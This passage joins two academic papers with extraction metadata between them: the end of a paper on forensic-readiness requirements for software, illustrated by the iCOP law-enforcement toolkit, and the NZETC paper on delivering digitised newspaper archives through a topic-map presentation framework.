filenames and hash values of files) together with metadata (e.g., when a user was last seen sharing a file) from public traffic on P2P networks. This information is passed on to the Analysis Engine, which compares the monitored hash values to a list of known hashes of CSA media seized by law enforcement. This allows the system to disregard CSA media already known to law enforcement. The file names that do not occur in the known hash lists are then analysed to assess their likelihood of containing CSA media. File names flagged as suspicious are passed back to the P2P Engine for downloading. The content of the downloaded files is subsequently analysed automatically by a Media Analysis module to determine whether the files contain child abuse material. Finally, the resulting list of suspicious new or previously unknown files is examined by investigators to confirm whether they contain child abuse images and videos. Once confirmed, these items are fed back into the hash database as known CSA media in future searches. Figure 1: Overview of the iCOP toolkit We aim to explore new software engineering methodologies and techniques for the design of software systems capable of supporting digital investigations proactively. In what follows, we consider the key requirements that software systems must satisfy and illustrate such requirements using the iCOP toolkit. 4 FORENSIC READINESS REQUIREMENTS In this section, we describe a preliminary set of requirements for forensic-ready systems that were elicited by reviewing existing literature on forensic readiness. We discuss the requirements in the context of the iCOP toolkit. We also distinguish between requirements that are data-centred and others that are process-centred. Availability. Data that may be useful for investigating potential incidents should be available [24, 27]. To achieve availability, data that may provide investigative clues must be preserved and retrievable by law enforcement agencies or individuals who are in charge of conducting an investigation. As data may not be kept in non-volatile memories (e.g., network traffic) and physical devices can have limitations (e.g., damaged hard drives), the capability to preserve data proactively must be in place. Preservation can be triggered by changes in the data to be collected [25], can be performed periodically [30] or for a limited amount of time [14], in order not to consume resources (e.g., battery power in a mobile device). To facilitate retrieval of preserved data, metadata should also be stored. In the context of the iCOP toolkit, data that can be useful to investigate incidents can be video and image files indicating a new child abuse and information about the users sharing CSA media (e.g., IP address, client ID). However, not all files can be preserved successfully because downloads are often slow and they stall if the computers sharing the file go off-line. To facilitate retrieval of such data, CSA related material, P2P network users and victims should be identified unambiguously. This is challenging because often the same CSA material is shared under different filenames and victims can appear in different files. Relevance. Data preserved proactively should be relevant to potential incident cases [28]. Relevance of data means whether data is able to support or refute hypotheses explaining how incidents occurred [3]. Ensuring relevance of preserved data allows an organization to have the data preservation activities more targeted on the risks to the business [24]. Relevance can be subject to the judgement of an investigator [26] and is typically determined by the files and data types available [12, 23] (e.g., email addresses, message information, date and time information, cookies, social security and credit card numbers from a computer hard disk image). In our example, to satisfy the relevance requirement, iCOP should ensure that stored CSA media is of new material or previously unknown. This is challenging because analysing the content of any file shared on the P2P network is not computationally tractable. The iCOP toolkit uses textual features of the filenames and characteristics of the users sharing the files (e.g., users sharing the greatest number of suspected files or sharing the greatest number of files) to identify CSA related media. However, files that do not contain any textual clues to their illegal content -which otherwise is relevant data - or that are shared by new users may not be preserved. Minimality. Data preserved proactively should not include any information that is unnecessary for the purpose of an investigation. Satisfaction of this goal can have the side-effect of reducing the amount of resources that are spent looking for digital evidence and, therefore, the costs of an investigation [27]. In our case study, to satisfy the minimality goal, the iCOP toolkit should not preserve files that do not refer to a child abuse case (false positives). A typical false positive error can be when webcam videos showing a child without any adult interaction are considered as CSA material. Satisfaction of the minimal goal highly depends on the type of data to be preserved; in our example, considering the difficulty of recognising CSA content, the minimal goal cannot be fully met. **Linkability.** Preserved data should be linkable with other pieces of evidence, such as other evidence and witness statements. This is very important to reconstruct how an incident took place when heterogeneous data are preserved, as it allows creating cause-effect relations between incident activities indicated by different evidences [24]. In the iCOP toolkit, ensuring linkability between media sharing is important to identify an individual sharing specific content uniquely. A connection is assumed to be a single user sharing a given set of files from a specific location. Storing the IP and the geolocation information (GUID), an investigator can easily view which connections are related via a common IP address or GUID. Additionally, all files that are confirmed to contain CSA content can be used by police investigators to identify unknown victims. **Completeness.** Preserved data should be sufficient to satisfy or refute an incident hypothesis. Satisfaction of this goal depends on the scope of an investigation, i.e., the portion of the environment in which an incident is assumed to have happened. For example, the scope of an investigation may be enlarged to include additional digital sources which can provide information about the location of new sources of evidence that may be relevant for the incident [15]. To satisfy the completeness goal, the iCOP toolkit should ensure preservation of any media related to child abuse that is shared on P2P networks. Currently the scope of the iCOP toolkit is limited to the Gnutella file sharing network and other P2P networks or social media are not considered. Achieving completeness requires making assumptions on the boundary of the investigation; this goal would be impossible to achieve if this boundary is not fixed. **Non-Repudiation.** Preserved data should constitute an evidence that is admissible legally and should be accepted in a court of law [8]. To achieve this goal preserved data should satisfy the integrity requirement, i.e. they should not be tampered from the time of acquisition until its final disposition [24, 27]. Preserved data should provide high assurances about their authenticity; for example, only specific trusted parties should be authorised to access it [24]. The chain of custody of data should also be maintained [24]. This means that all changes in the control, handling, possession, ownership or custody of a piece of evidence should be documented. In our example, iCOP should ensure that preserved CSA content can only be accessed by police investigators in possession of login credentials. Moreover it should provide techniques to assess authenticity of media files and maintain their chain of custody. Additional tools and procedures to satisfy these requirements must be adopted by the individual law enforcement agencies. **Data provenance.** The process adopted to preserve data should record when, how and by whom such data is originated, moved and modified over time. The Transparent Computing1 program encourages provenance of system components to identify relationships between system activities [6] that may be related to a cyber threat. As provenance information can grow over time it is also necessary to summarise such information meaningfully [2]. In our example, data provenance can refer to preservation of files meta-data (e.g., creation date) that provide more information about multiple abuses of the same victim over time. Data about the P2P users can also support identification of new users sharing CSA material. **Legal compliance.** The process adopted to preserve data should ensure compliance with existing regulations, which may vary depending on the jurisdiction(s) in which an incident may occur. Identification of what regulations apply to a specific system depends on the nationality and the physical location of the data subject, as well as the physical location of the organization collecting data. For example, the General Data Protection Regulation (GDPR)2 in Europe and the Fourth Amendment in USA [1] regulate what data can be preserved and under which conditions (privacy). The EU Data Retention Directive, can prescribe for how long data should be retained (retention). The GDPR also prescribes for how long data be accessed and by whom (access to retained data). For the iCOP case study, media files can be preserved in UK because they are “voluntarily” shared to third parties but this would not apply in other European countries, such as Belgium. Any monitoring and downloading of CSA media can only take place at suitable law enforcement premises and access to CSA material is only given to police investigators, in order to ensure privacy of victims’ identities. ## 5 SOFTWARE ENGINEERING CHALLENGES We elicit a number of open software engineering challenges. 1. **Representing and reasoning about forensic-ready systems.** We have presented a first conceptualization of forensic readiness requirements of software systems. There is a need to build a consensus around the key characteristics of forensic-ready software systems. We can divide the implications and challenges into three sub-categories: (i) concept (how to represent and reason about forensic-ready systems and their properties), (ii) method (how to design and implement forensic-ready systems), and (iii) tools (how to analyse and support the development of forensic-ready systems). Existing work on concepts and taxonomy of dependability [4] could be a useful reference model to extend to forensic readiness. Such characterization would facilitate a better understanding of the potential relationship between forensic-ready requirements and other types of requirements such as security, privacy and safety. Furthermore, there is a need to characterise forensic-ready systems formally. This requires identifying formal languages—if any—that are best suited to express forensic readiness requirements, and will allow us to understand the extent to which existing representation and reasoning techniques are applicable to forensic-ready systems. 2. **Methods for engineering forensic-ready software systems.** The notion of forensic readiness poses challenging questions for software engineering methods and particularly how should existing methods adapt to account for forensic readiness requirements. Research is needed to answer a number of fundamental questions related to how requirements for forensic-ready systems should be implemented and whether these requirements are solely about data preservation activities. Architectural patterns (similar to security patterns [29]) could also be investigated to design forensic-ready systems. Additional challenges relate to managing trade-offs between forensic readiness requirements such as privacy and availability given that some of these could manifest at runtime. For --- 1[https://www.darpa.mil/program/transparent-computing](https://www.darpa.mil/program/transparent-computing) 2Regulation (EU) 2016/679 3. Verification of forensic readiness requirements. A key challenge is verifying that existing software systems satisfy forensic readiness requirements. Research questions relate to whether these requirements need to develop different verification techniques compared to those adopted to verify safety and security properties and whether satisfaction of forensic readiness requirements can be guaranteed at design time. Our analysis of the iCOP system demonstrates that satisfaction of forensic readiness requirements cannot be blanket and trade-offs arise from the interaction of forensic readiness requirements with properties of the environment or various (human or software) agents and investigative processes that interface with a software system. There are also interesting challenges with regards to impact on other functionality of the system, for instance, ensuring that runtime forensic processes are not intrusive and disruptive of normal system functions. 4. Technological developments. Perhaps the wicked problem posed for forensic readiness is the one arising from the increasing deployment of Internet of Things (IoT) devices—and the software embedded within these devices—in everyday settings. In such smart cyber-physical environments, the system design cannot be anticipated a-priori and is only emergent a-posteriori when various IoT devices dynamically compose to deliver various services. Even more critically this emergent design is volatile in that the system configuration—and the devices engaged—may change on a regular basis. An example of this is a user with wearables walking through a smart city environment with various devices coming in and out of range and interfacing with each other. Such a dynamically aggregated environment poses major challenges for forensic readiness of software systems—how are the goals of availability, relevance, non-repudiation, legal compliance, completeness, minimality, and linkability impacted in such a setting is a non-trivial question to be addressed by software engineering research. 6 CONCLUSION In this paper we investigated the notion of forensic readiness in software systems and the requirements that support its attainment, highlighting some of the open software engineering challenges. For future work we plan to provide a formal characterization of forensic readiness requirements. We will also explore techniques for analyzing trade-offs between conflicting requirements. Finally we will investigate aspects related to the implementation of a forensic-ready system, such as the generation of specification for such systems or assessment of relevance of preserved data. ACKNOWLEDGEMENTS This work is supported by EPSRC Grant: EP/N028112/1, EU Safer Internet Programme project SI 2601002, and SFI Grants 10/CE/1855, 13/RC/2094 and 15/SIRG/3501. Addendum: This work received funding from the ERC for the project Adaptive Security and Privacy (ERC Advanced Grant 291652) REFERENCES
{"Source-Url": "http://oro.open.ac.uk/55503/8/55503.pdf", "len_cl100k_base": 4268, "olmocr-version": "0.1.53", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 16255, "total-output-tokens": 6576, "length": "2e12", "weborganizer": {"__label__adult": 0.0019550323486328125, "__label__art_design": 0.00112152099609375, "__label__crime_law": 0.11871337890625, "__label__education_jobs": 0.0048370361328125, "__label__entertainment": 0.0002694129943847656, "__label__fashion_beauty": 0.0006895065307617188, "__label__finance_business": 0.0006694793701171875, "__label__food_dining": 0.0009398460388183594, "__label__games": 0.0030612945556640625, "__label__hardware": 0.00357818603515625, "__label__health": 0.002727508544921875, "__label__history": 0.001094818115234375, "__label__home_hobbies": 0.00030541419982910156, "__label__industrial": 0.0013942718505859375, "__label__literature": 0.0012950897216796875, "__label__politics": 0.001949310302734375, "__label__religion": 0.001056671142578125, "__label__science_tech": 0.0941162109375, "__label__social_life": 0.0004396438598632813, "__label__software": 0.03387451171875, "__label__software_dev": 0.72314453125, "__label__sports_fitness": 0.000926971435546875, "__label__transportation": 0.0016384124755859375, "__label__travel": 0.0004398822784423828}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 28195, 0.06289]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 28195, 0.30581]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 28195, 0.89626]], "google_gemma-3-12b-it_contains_pii": [[0, 710, false], [710, 1202, null], [1202, 6392, null], [6392, 12961, null], [12961, 20208, null], [20208, 28195, null]], "google_gemma-3-12b-it_is_public_document": [[0, 710, true], [710, 1202, null], [1202, 6392, null], [6392, 12961, null], [12961, 20208, null], [20208, 28195, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 28195, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 28195, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 28195, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 28195, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 28195, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 28195, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 28195, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 28195, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 28195, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 28195, null]], "pdf_page_numbers": [[0, 710, 1], [710, 1202, 2], [1202, 6392, 3], [6392, 12961, 4], [12961, 20208, 5], [20208, 28195, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 28195, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
3e8170300824d35f00bafbe143aafff8ee9ae5ef
Introduction This paper will discuss some of the requirements for the successful online delivery of newspaper archive content to users and examine an innovative approach taken to fulfil those requirements by using a semantic framework. This approach is based on the digital library delivery system configured by the New Zealand Electronic Text Centre (NZETC), the working name of which is the Topic Map Presentation Framework (TMPF). It has been developed as a production system at the NZETC since 2002 and is currently used to deliver the Centre’s own growing collection of digital resources, a nationally important website containing more than 40,000 pages and over half-a-million hyperlinks. Since 2005 the NZETC has been working with APEX to further develop the TMPF as means of providing sophisticated access to digitised newspaper archives wherein the semantic navigation of online resources greatly enhances the user experience in digital libraries. Using this approach, an ontology codifies an analysis of the structure and relationships in the domain of newspaper publishing and archiving, including publishers, issues, articles, pages, clippings, places, and dates. Metadata is automatically harvested from the source materials into this conceptual framework, producing a map of the content. This map is then used to present the content online in a meaningful structure. This paper will also briefly cover some of the open technologies used, including Topic Maps, the CIDOC Conceptual Reference Model, Apache Cocoon, and Apache Lucene. Delivering newspaper content over the web Delivering newspaper content over the web presents many challenges and requires a delivery system that is technically sophisticated on the inside and intuitive to use on the outside. There are challenges to be met in several areas: the forms of content to be delivered, the granularity of access provided, modes of access enabled, extensibility, customization, usability and performance. This section will look briefly at each of these areas in turn to provide a context for the subsequent discussion of the TMPF. As regards the forms of content to be delivered over the web from a newspaper archive, a key question is whether to provide user with access to the transcribed text of the newspaper, to images of the original printed newspaper, or to both? Delivering both forms of content has several advantages. The images enable access to content which cannot be transcribed such as photographs, illustrations and complex diagrams. They also provide information through visual details such as the size of headline, the style of font, or design of page layout which is not conveyed by the transcribed text. The transcribed text itself can be usefully provided to users because, in addition to providing the raw material for full text searches, in most cases it will be more legible than the original. As text it is also more malleable than an image in that the presentation can be altered to fit users need by altering font sizes, page layout and other variables. In some projects there may be an additional requirement to provide user access to source images as distinct from access images. Consideration is also needed of what tools --- 1 New Zealand Electronic Text Centre and mechanisms will be provided to enable users to engage with and use the content. Tools, for example, to zoom in and out of access images; to provide a version of each newspaper page suitable for printing; to send a URL, page or image to an email address; to downloading or print an entire newspaper issue; to downloading metadata records (e.g. for inclusion in a reference management system like Endnote). It is often the case that a newspaper archive will be incomplete, that there will be missing issues from a publication or missing pages from a particular issue. There may also be printing anomalies in newspaper pages such as incorrect page numbers and incorrect dates. A newspapers delivery system needs to be able to handle such cases, make omissions visible to users and support metadata describing printing anomalies which can also be made visible to users. The granularity of access provided is an interesting question. Should users be able to navigate or search to the level of a newspaper page, or to the individual articles on those pages? This is an area in which the delivery system is almost wholly dependant on decisions made during the digitisation process. If article-level access images and mark-up have not been created the delivery system can only operate at the page level. In general, it is more challenging to define articles within newspapers than to define structural sub-units of journals and monographs. In most journals, the articles are easily identified as distinct units within the whole. Chapters serve that function for books. Smaller pamphlets are typically treated as a whole, without sub-units. When both commercial publishers of historic newspapers, as well as institutions such as the British Library, poll user groups to find out whether users prefer working with page-level or article-level files, the overwhelming response is that the preference is for article-level access. Users certainly want the ability to view an entire page, but most users seem to find that navigating from a hit list of relevant article citations directly to the article itself makes for a more efficient and satisfying user experience. The USA's Library of Congress (LOC) is currently in the midst of a project to create a test bed of digitized newspapers for its National Digital Newspaper Program (NDNP), the specifications for which are page-level files. Nevertheless, many of the US State Libraries which are doing the digitization of the issues coming from their own collections are creating two sets of digitized objects: issue-level files for delivery to the LOC and also a set of article-level files for themselves, since the state-level editorial boards selecting the titles for conversion requested them. While it remains to be seen what the LOC will ultimately specify once the test bed is created and users have weighed-in on the results, the vast majority of other institutions involved with digitizing significant quantities of newspaper content are adopting article-based models over page-based models. When we consider the modes of access to be provided, we are asking what search facilities will be presented to the user, what browsing methods will be enabled? Where an article-based model has been adopted during the digitisation process then the delivery system should make the most of this source material and allow navigation straight to a given article as well as between articles on the same page or in the same issue, and from page to page and issue to issue. Browsing by newspaper or article title, by date, by geographic region, by author, by subject or by any other item of metadata may be appropriate. Ideally simple full text searching of all newspapers should be available as well as a separate “advanced” search interface which includes support for fielded searching of selected metadata fields; standard Boolean search operators, phrase queries, wildcard queries and proximity operators. Allowing searches to be limited by date, publication, or other metadata fields (e.g. newspaper category, article type) would further increase functionality. Finally, as regards modes of access, there is a need to develop support for access by other systems through interoperability tools and protocols such as OpenURL, OAI-PMH and SRU / SRW. AT the NZETC we feel strongly that the systems should conform to relevant public guidelines, specifications and standards where possible to achieve a high level of modularity of the system architecture and to facilitate broad interoperability. 2 OpenURL is ANSI/NISO Standard Z39.88-2004 3 The Open Archives Initiative Protocol for Metadata Harvesting 4 Library of Congress standard for web services for search and retrieval based on Z39.50 semantics Extensibility is the degree to which the system will enable the inclusion, not only of other resources and data types, but also of metadata from other sources so as to enhance existing content. Customization is the extent to which the interface is customizable, both by the institution maintaining the archive (e.g. to meet branding guidelines) and by the user. For a user this might mean a ‘MyNewspaperArchive’ approach which could allow users to use personalised features, such as personal preferences, favourite newspaper titles, saved pages, saved search result sets. Finally, usability and performance cover a range of issues such as what range of browsers will be supported? What level of context sensitive help will be provided? Will the system meet W3C accessibility guidelines? What performance requirements must be met? The NZETC Topic Map Presentation Framework These were the challenges facing the NZETC when we started develop the Topic Map Presentation Framework (TMPF) for newspaper delivery. The work was prompted by the actions of the National Library of New Zealand and the National Library of Australia both of whom issued, in 2005, public requests for proposals to provide online access to their existing newspaper archives. In response to these requests the NZETC starting working with APEX CoVantage to explore what could be achieved by combining experience in developing semantic navigation frameworks at the NZETC with the newspaper digitisation expertise at APEX. This section will describe some of salient features of the TMPF before describing the example newspaper delivery system built using the TMPF. The TMPF in production at the NZETC is a dynamically-generated semantic framework – a metadata repository implemented using the ISO Topic Map standard instead of the more usual implementation based directly on a relational database. The topic map metadata repository provides the system with an unusually flexible and open-ended conceptual structure. This has a number of benefits, including greatly simplifying the integration of disparate information systems and facilitating the presentation of contextually rich web pages. Users are able to move around the resources on the site tracking topics of interest rather than merely browsing the material linearly or through text searching. In a topic map, web-based resources are grouped around items called “topics”, each of which represents some subject of interest. In the NZETC topic map, the topics represent books, chapters, and illustrations, and also people and places mentioned in those books. Topics in a topic map are linked together with hyperlinks called “associations”. There can be different types of association in a topic map, representing the different kinds of relationship in the real world. For instance, in the NZETC topic map, the topic which represents a particular person may be linked to a topic which represents a chapter of a book which mentions that person. This association would be labelled to indicate that it represents a "mention". Similarly, the same person's topic might be linked to a particular photograph topic, via a "depiction" association. This identification and codification of topics and associations is essentially the act of creating an ontology. Modelling domain relationships requires a sophisticated analysis of real work entities, a difficult and time consuming task. We have therefore taken advantage of the seven year effort by the CIDOC Conceptual Reference Model group to create a high-level ontology known as the CIDOC CRM. This ontology was designed to enable information integration for cultural heritage data and their correlation with library and archive information. The NZETC has based the semantics of the TMPF on the event-based model of the CIDOC CRM as illustrated below. --- 5 W3C Recommendation on making web content accessible to people with disabilities. http://www.w3.org/TR/WAI-WEBCONTENT/ 6 CIDOC CRM http://cidoc.ics.forth.gr/ This allows us to express relationships such as those illustrated in the diagram below. The central topic, Te Rangihaeata, was a chief of the Ngati Toa. In the topic map, the topic which represents him is associated with three other topics, each of which has an occurrence. The association on the left represents a depiction of Te Rangihaeata. The picture which depicts him is “Figure 85” from a book by Elsdon Best called “The Maori as he was”. On the right, “Textiles, Clothing, and Ornaments” is a chapter from the same text, which mentions him. Both of these associations were of course harvested from the XML file containing the Elsdon Best book. In the centre, Te Rangihaeata is associated with a web page on the website of the Dictionary of New Zealand Biography. This last piece of information was harvested from our name list. Note that the central topic “Te Rangihaeata” was harvested twice – once from the Elsdon Best book, and once from the names list. But these two topics merged together automatically, leaving us with just one topic with 3 associations. To construct our topic map, we use XSLT\(^7\) stylesheets to extract metadata from each of our XML text files, and express it in the XTM\(^8\) format. In this way we automatically create hundreds of topic maps, each of which describes one of our texts. We also harvest information about people, places and organisations from a MADS\(^9\) authority file which we construct from what is mentioned in our collection. Finally we merge the harvested topic maps together to create a unified topic map which describes our entire website. By harvesting not only bibliographic metadata but also references to people, organisations and places, the site provides individual pages for topics of interest, linked automatically to those places they are mentioned or illustrated. Being automatically generated from the source XML files, maintenance is simple and the number and types of topics linked to can be increased simply by adding extra mark-up to the texts. Each page on the website represents one of these topics, along with any associated topics. The screenshot below is the page for Te Rangihaeata. ![Screenshot from NZETC Collection](image) Figure 3 Screenshot from NZETC Collection The topic map manages all the hyperlinks, bibliographic metadata, structural metadata, annotations, classifications, name authorities and glossaries for the entire website. By extracting all the metadata needed from every resource available and merging it all together in the topic map, it is ensured that all relevant information is prepared and readily available to \(^7\) W3C specification for the syntax and semantics of a language for transforming XML documents into other XML documents [http://www.w3.org/TR/xslt](http://www.w3.org/TR/xslt) \(^8\) XML Topic Maps [http://www.topicmaps.org/xtm/](http://www.topicmaps.org/xtm/) the Bishop of Wellington, and addressed to your Grace. I have known William King for more than twenty years. I have had favourable opportunities for becoming acquainted with all the facts connected with the pretended purchase of his land. I have during eighteen years paid much attention to the subject of native titles to land; and fourteen years ago I wrote a paper on this subject, which I gave to Sir George Grey, and for which I received his thanks. Besides, having frequently told William King and [George Grey, soldier, explorer, colonial governor, premier, scholar], the most solemn and positive statements published in official documents, that the British Government never would unjustly seize their lands, I am now ashamed to meet these chiefs, however unconsciously I may have misled them. Figure 4 Screenshot from NZETC website. http://www.nzetc.org/tm/scholarly/tei-HadOneOtt-body.html#name-208095-1 The hyperlink pointing to the page about Grey has a tool tip (an HTML title attribute) saying “Sir George Grey. Soldier, explorer, colonial governor, premier, scholar.” This tool tip was drawn not from the encoded text of the pamphlet but from a record about George Grey in an authority file. When the authority file was imported into the topic map, a topic was created to represent George Grey, and this topic was merged with all the references to George Grey in the encoded texts, so that every hyperlink on the website which points to the George Grey page now has the same “authoritative” tool tip. TMPF makes use of a number of public guidelines, specifications and standards, as listed in the table below. <table> <thead> <tr> <th>Purpose</th> <th>Specification</th> <th>Reference</th> </tr> </thead> <tbody> <tr> <td>Encoding (general)</td> <td>XML</td> <td><a href="http://www.w3.org/TR/REC-xml/">http://www.w3.org/TR/REC-xml/</a></td> </tr> <tr> <td>Addressing</td> <td>URI</td> <td><a href="http://www.w3.org/Addressing/">http://www.w3.org/Addressing/</a></td> </tr> <tr> <td>Text encoding</td> <td>TEI</td> <td><a href="http://www.tei-c.org/Guidelines2/">http://www.tei-c.org/Guidelines2/</a></td> </tr> <tr> <td>OCR encoding (under development)</td> <td>ALTO</td> <td><a href="http://www.loc.gov/ndnp/techspecs.html">http://www.loc.gov/ndnp/techspecs.html</a></td> </tr> <tr> <td>Authority control</td> <td>MADS</td> <td><a href="http://www.loc.gov/standards/mads/">http://www.loc.gov/standards/mads/</a></td> </tr> <tr> <td>Transformation of XML source materials into presentation formats</td> <td>XSLT</td> <td><a href="http://www.w3.org/TR/xslt">http://www.w3.org/TR/xslt</a></td> </tr> <tr> <td>Presentation</td> <td>HTML</td> <td><a href="http://www.w3.org/MarkUp/">http://www.w3.org/MarkUp/</a></td> </tr> <tr> <td>Page formatting</td> <td>CSS</td> <td><a href="http://www.w3.org/Style/CSS/">http://www.w3.org/Style/CSS/</a></td> </tr> <tr> <td>Image processing</td> <td>SVG</td> <td><a href="http://www.w3.org/Graphics/SVG/">http://www.w3.org/Graphics/SVG/</a></td> </tr> </tbody> </table> Using the TMPF for Newspaper Delivery When the NZETC started to work with APEX to use the TMPF as a newspaper delivery system we created two small demonstration sites for the National Library of Australia and the National Library of New Zealand using content from their newspaper archives. The Australian site has 7413 web pages, including 204 issues, consisting of 847 newspaper pages and 6362 articles. The New Zealand site is about half that size. The creation of these demonstration sites was work undertaken at the NZETC and APEX to explore how well the Topic Map system worked with newspaper content and does not represent any decision by either National Library to use this technology. The NZETC is just one of many respondents to the RFPs issues by the libraries. The use of the TMPF to deliver example content from the two libraries on these demonstration sites is not indicative of any technology or vendor choices or decisions made by either library. The two demonstration sites are not available to the public. The APEX Intelligent Zoning and Algorithmic Conversion (IZAAC) was used to convert digital images of the newspapers into XML encoded text\(^\text{10}\). In Apex’s process, an Article is defined as a “complete newspaper story.” This concept is extended to a number of newspaper elements, including small, continuous units of like content, such as news briefs and classified advertisements, and stand-alone features, such as photographs, illustrations, and crossword puzzles. The IZAAC process relies on human cognition to identify and zone articles, rather than relying on an automated process. Automated approaches are adequate for extremely simple layouts and standardized formats; but when applied to newspapers, the results are usually unacceptable. Logical analysis alone cannot recognize discontinuous portions of an Article even on the same page, let alone across pages. Perhaps for this reason, many commercial software packages that rely on automated article definition use proxy terms for Articles, such as “chunks”. Chunks can miss portions of an Article or may overlap across Articles. Neither is acceptable from a user-experience perspective. Illustrations that are part of an Article are included with the Article. Illustrations that do not have associated text are treated as separate Articles. Captions are included with the illustrations and are tagged as such, supporting searches by caption. Articles are always associated with the page on which they appear. The availability of article-level metadata and more accurate OCR text output exponentially increases the points of access into the collection which the TMPF can provide to users. The newspaper demonstration sites provide access to both the access images and to the transcribed text. They also give users the option to hide the transcribed text if they are only interested in viewing the images. The TMPF for newspaper delivery supports browsing of the full list of newspaper titles by title and by date. Users can browse within a selected newspaper issue and navigate from page to page, from any page to the first page of the issue, from any page to the issue web page, and \(^{10}\) Although the TMPF used to deliver the NZETC collection from any page to the publication web page. Users can also browse from article to article on a given page or in a given article. This is enabled through a topic map which includes topics for a newspaper series (e.g. “The Times”), a newspaper issues (e.g. “The Times 18th June 1942”), pages, articles, article images, publishers and dates. As with the TMPF used in production for the NZETC collection this very simple ontology for the newspaper domain is encoded as an extension of the much more complex and sophisticated CIDOC CRM. In the near future we expect to include support for browsing the issues of a selected newspaper by date through an interface similar to the calendar pages and browsing by geographic region of newspaper coverage. TMPF already harvests publication date information in its topic map, including relating the dates to a calendar of years, decades, and centuries. Exposing these date topics for browsing will require only minor additions to the user interface layer. Although TMPF already includes publication place information in its topic map, this is not quite the same as geographic coverage. However, only minor development work would be required to harvest geographic coverage from newspaper source files and present a browsable user interface, including using a clickable map of NZ. In fact, because TMPF uses a topic map to define browse points, any and all metadata harvested into the topic map (whether from the newspaper source materials or from external data sources) can be used as the basis for browsing the newspaper collection. To enable users to view the access images of the newspaper pages and articles we used “Zoomify” technology to provide zooming and panning functionality. The free Zoomify EZ encoder creates multiple copies of an image at many resolutions tiers, from the original source resolution down to a thumbnail. Each tier is then cut into many small tiles. All the tiles from all the tiers are combined into a folder of JPEG files with an index of the exact location of every tile. Tile organization is pyramidal in that tiles are stacked from a thumbnail down to the highest resolution, tier upon tier. When the converted image is viewed, the Zoomify Flash Viewer requests tiles from the appropriate tier to fill the display area. Each zoom and pan requests only a small additional number of tiles: those at the level of zoom desired or for the part of the image panned to. These additional tiles are streamed on-demand, to the viewer. No tiles are ever delivered unless required for the current display, or for a display that is anticipated to immediately follow (intelligent pre-fetching). ![Figure 5 Pyramidal Tiled Multi-Resolution Image from Zoomification Process. Taken from http://www.zoomify.com](http://www.zoomify.com) As the screenshot below shows, the user has the ability to zoom in and out of the image, and to pan left, right, up and down around a page or an article. The thumbnail in the top left hand corner is a further navigational aid in that it informs the user of the location of their current view. To enable searching over the newspaper archive we used the Apache Lucene\(^1\) search engine, again as we do for the TMPF in production at the NZETC. It provides all the search functionality discussed in the “Delivering Newspaper Content” section above including an optional module for synonym expansion in search queries is using the WordNet thesaurus. Users can limit their search to a particular newspaper title and / or by a date range. \(^{1}\) Apache Lucene [http://lucene.apache.org/java/docs/index.html](http://lucene.apache.org/java/docs/index.html) Search words or phrases results per page Optional: restrict to material entitled date of publication (YYYYMMDD) between and (inclusive) in serial Search Search results are displayed as a list of links to relevant resources with large result sets split across several pages. The user can set the number of results displayed on each query result screen, and navigate easily between result screens. Result pages are also bookmarkable. The Lucene search engine uses a sophisticated relevance ranking algorithm to sort results. Article titles and other important or quality-assured metadata can be boosted in importance when building the Lucene search index, so that Lucene accords hits on these fields a greater weight. Lucene’s query syntax also allows users to boost the priority of individual words or phrases in their queries, so that documents containing those terms are regarded as more relevant than unboosted terms. Background information describing the history of each newspaper can be included on the appropriate publication web page. Such a background article can be written either directly in HTML or in XML. Such an article is linked to the newspaper it describes by using the persistent identifier of the newspaper as the subject of the article, in the article’s metadata header. It is important to note that the exact same technique can also be used to associate background information with individual newspaper issues, pages, or articles. When missing pages or printing anomalies are encountered in the source material the TMPF system handles different types of omissions in different ways. If there is a story behind the omission, this story can be encoded as another text and linked to an appropriate part of the collection: the newspaper series, individual issue, article or page. TMPF would then include and display this explanatory material in the appropriate context. Alternatively, where content is missing from inside a document, the omission may be encoded using appropriate XML markup in the source material (such as the <gap> element in the TEI mark-up language) to describe the missing content or explain the omission. Where entire issues are missing, XML files empty of content can be used as placeholders for the missing material. Errors and anomalies in the source materials can be explicitly marked as anomalies using appropriate XML mark-up, such as the <sic> and <corr> elements in the TEI mark-up language. The TMPF approach means a wide range of textual materials can be included in the delivery system, such as journals and monographs (e.g. pamphlets). TMPF is currently used by the NZETC to present its digital collection which includes books, journals, letters, and pamphlets. TMPF is fully extensible to handle a potentially infinite variety of materials. Different document types can be presented in distinct ways, or, to the extent that they can be interpreted in terms of a common conceptual model, they can then be presented in an identical fashion, to provide... a consistent user experience regardless of the different document formats, encoding practices, and storage technologies. TMPF is designed to be easily extensible to other data types, metadata schemas, and knowledge domains. The use of a topic map for the central metadata repository in TMPF provides an open-ended framework for importing, mapping and meaningfully presenting information from a number of distinct information systems. TMPF can import and merge pre-existing metadata from other sources. The NZETC has used TMPF to import metadata records from other sources and merge them with metadata describing TMPF’s own collection. To import and merge metadata from external sources, the metadata should be exported in some XML format, and an XSLT transformation is used to extract metadata in the common XML Topic Map (XTM) format, which is then imported and merged. Merging of metadata records in general requires only that items of interest can be identified by a URI. For newspapers this might be an ISSN, DOI, URN, or simply an HTTP URL. The topic map metadata repository in TMPF can record mappings between different name authorities and perform cross-walks between sets of metadata using those authorities. All metadata records for resources with a particular identifier are automatically merged. Merging 